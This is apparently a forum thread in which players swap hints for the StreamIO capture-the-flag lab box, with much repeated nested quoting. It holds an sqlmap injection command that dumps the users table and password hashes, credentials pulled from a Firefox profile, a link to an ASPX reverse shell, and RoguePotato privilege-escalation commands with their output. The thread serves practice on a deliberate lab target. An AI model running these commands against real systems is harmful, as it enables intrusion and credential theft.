Posts: 12 Threads: 0 Joined: N/A (June 5, 2022, 08:45 PM)jon01 Wrote: (June 5, 2022, 08:27 PM)myzqlz Wrote: https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
crack C:\Users
ikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db
try to crack with sharpweb : doesnot see anything try https://github.com/lclevy/firepwd Posts: 13 Threads: 0 Joined: N/A (June 5, 2022, 08:49 PM)jon01 Wrote: (June 5, 2022, 08:47 PM)myzqlz Wrote: (June 5, 2022, 08:45 PM)jon01 Wrote: (June 5, 2022, 08:27 PM)myzqlz Wrote: https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
crack C:\Users
ikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db
try to crack with sharpweb : doesnot see anything
try https://github.com/lclevy/firepwd
bdw how did u get slack vhost? You can get the subdomain info in C:\Users ikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\logins.json. Then crack the passwords using https://github.com/lclevy/firepwd. There's a 404 on slack, still have to fuzz around. (June 5, 2022, 02:44 PM)dude4695 Wrote: someone saying that we can use yoshihide user to privilege escalation (for administrator)
he gave me this hint
saying that it is unintended way to do with web user yoshihide
Aspx + iis gives you more
Hint aspx is different
You can make one
i didn't get what he wants to say i used https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx this aspx shell didn't gave me Administrator gave me same yoshihide user shell When getting through the aspx shell as yoshihide, your user has additional privileges. The important one is SeImpersonatePrivilege, which points to a possible privesc route straight to system using RoguePotato Posts: 74 Threads: 0 Joined: N/A I am stuck as nikk37, dumped the creds from Firefox profile, but now what? Any hints? Posts: 36 Threads: 0 Joined: N/A (June 5, 2022, 11:10 PM)11231123 Wrote: I am stuck as nikk37, dumped the creds from Firefox profile, but now what? Any hints? I'm stuck here as well, I have no idea how to use those creds to log in, tried everything I could come up with Posts: 24 Threads: 0 Joined: N/A (June 5, 2022, 06:40 PM)Exa Wrote: (June 5, 2022, 06:34 PM)Peter Wrote: (June 4, 2022, 09:04 PM)dude4695 Wrote: user = yoshihide
pass = '66boysandgirls..'
How to crack the hash to that pass? I try rockyou, bruteforce and online services.
https://crackstation.net/ Thanks Exa, the first MD5 dump for me doesn't work. Something curios happen, to retrieve quick admin supposed witch is_staff 1 then username and pass, but the pass don't match with user..... sqlmap -u "https://streamIO.htb/login.php" --method POST --data "username=FUZZ&password=FUZZ" -D STREAMIO -T users -C id,is_staff,username,password --where "is_staff=1" -pivot-column id --dump --batch --force-pivoting +----+----------+----------------------------------------------------+----------------------------------------------------+ | id | is_staff | password | username | +----+----------+----------------------------------------------------+----------------------------------------------------+ | 9 | 1 | fd78db29173a5cf701bd69027cb9bf6b | yoshihide wrong columns, the md5 is for other user. At now got it! sqlmap -u "https://streamIO.htb/login.php" --method POST --data "username=FUZZ&password=FUZZ" -D STREAMIO -T users -C id,is_staff,password,username --where "id=31" -pivot-column id --dump --batch --force-pivoting +----+----------+----------------------------------------------------+----------------------------------------------------+ | id | is_staff | password | username | +----+----------+----------------------------------------------------+----------------------------------------------------+ | 31 | 1 | b779ba15cedfd22a023c4d8bcf5f2332 | yoshihide | Posts: 40 Threads: 0 Joined: N/A (June 5, 2022, 09:15 PM)floris Wrote: (June 5, 2022, 08:49 PM)jon01 Wrote: (June 5, 2022, 08:47 PM)myzqlz Wrote: (June 5, 2022, 08:45 PM)jon01 Wrote: (June 5, 2022, 08:27 PM)myzqlz Wrote: https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
crack C:\Users
ikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db
try to crack with sharpweb : doesnot see anything
try https://github.com/lclevy/firepwd
bdw how did u get slack vhost?
You can get the subdomain info in C:\Users
ikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\logins.json. Then crack the passwords using https://github.com/lclevy/firepwd.
There's a 404 on slack, still have to fuzz around.
(June 5, 2022, 02:44 PM)dude4695 Wrote: someone saying that we can use yoshihide user to privilege escalation (for administrator)
he gave me this hint
saying that it is unintended way to do with web user yoshihide
Aspx + iis gives you more
Hint aspx is different
You can make one
i didn't get what he wants to say i used https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx this aspx shell didn't gave me Administrator gave me same yoshihide user shell
When getting through the aspx shell as yoshihide, your user has additional privileges. The important one is SeImpersonatePrivilege, which points to a possible privesc route straight to system using RoguePotato Is there a specific wordlist I need to use to fuzz the slack subdomain? I've tried a bunch of options fuzzing both as as a dir and as an api but nothing so far. Posts: 23 Threads: 0 Joined: N/A (June 5, 2022, 09:15 PM)floris Wrote: (June 5, 2022, 08:49 PM)jon01 Wrote: (June 5, 2022, 08:47 PM)myzqlz Wrote: (June 5, 2022, 08:45 PM)jon01 Wrote: (June 5, 2022, 08:27 PM)myzqlz Wrote: https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
crack C:\Users
ikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db
try to crack with sharpweb : doesnot see anything
try https://github.com/lclevy/firepwd
bdw how did u get slack vhost?
You can get the subdomain info in C:\Users
ikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\logins.json. Then crack the passwords using https://github.com/lclevy/firepwd.
There's a 404 on slack, still have to fuzz around.
(June 5, 2022, 02:44 PM)dude4695 Wrote: someone saying that we can use yoshihide user to privilege escalation (for administrator)
he gave me this hint
saying that it is unintended way to do with web user yoshihide
Aspx + iis gives you more
Hint aspx is different
You can make one
i didn't get what he wants to say i used https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx this aspx shell didn't gave me Administrator gave me same yoshihide user shell
When getting through the aspx shell as yoshihide, your user has additional privileges. The important one is SeImpersonatePrivilege, which points to a possible privesc route straight to system using RoguePotato I tried the RoguePotato method and didn't work for me. PS C:\windows\temp> whoami /all
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
RoguePotato failed: PS C:\windows\temp> .
p.exe -r 10.10.x.x -e "cmd.exe /c ping -n 2 10.10.x.x" -l 9999
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written:104 bytes
[-] Named pipe didn't received any connect request. Exiting ...
Posts: 213 Threads: 0 Joined: N/A Running crackmapexec with the passwords from Firefox, there is a valid password for the JDgodd user.
I couldn't login with these credentials though. Posts: 40 Threads: 0 Joined: N/A (June 6, 2022, 06:56 AM)jon01 Wrote: (June 6, 2022, 05:40 AM)Exa Wrote: Running crackmapexec with the passwords from Firefox, there is a valid password for the JDgodd user.
I couldn't login with these credentials though.
try seing in bloodhound I am unable to use the attack vector that bloodhound shows. Add-DomainObjectAcl just hangs Posts: 1 Threads: 0 Joined: N/A https://streamio.htb/admin/master.php is accessible |
